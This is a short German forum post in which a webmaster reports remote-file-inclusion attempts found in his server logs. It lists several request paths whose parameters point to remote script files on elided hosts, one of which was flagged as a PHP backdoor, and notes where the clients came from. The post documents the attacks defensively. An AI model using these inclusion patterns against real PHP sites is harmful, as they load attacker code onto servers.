Hi,
ich habe mir übrigens gerade mal die libwww-perl - Einträge näher angesehen, bei denen das zuvor genannte PHP-Script von unterschiedlichen Domains eingeschmuggelt werden soll.

• an existierende URLs über /bp_ncom.php?bnrep=http://.../galery.jpg??? angehängt
• über /index.php?ipath=http://.../safe.txt?
• über //action.php?scdir=http://.../remote.txt?
• über //config.inc.php?path_escape=http://.../scrol.txt?
• über /admin/doeditconfig.php?thispath=../includes&config[path]=http://.../id.txt???
  Diese Clients kamen bis auf einen STRATO-User aus USA und Südkorea.

Und dann gab es noch einen ganz bösen Buben, der über
/"allinurl:.php?ipath=http://.../brazil667.txt?
bzw.
/"index.php?ipath=http://.../brazil667.txt?
eine Datei einschleusen wollte, bei der Kaspersky sofort aufkreischte und "Backdoor.PHP.Small.o" meldete. Scheint wohl eine Sicherheitslücke in irgend einem Clan-Script zu betreffen, denn der Kerl kam aus Berlin über clanserver4u GmbH (und danach Artfiles IP Network).

freundliche Grüße
Ingo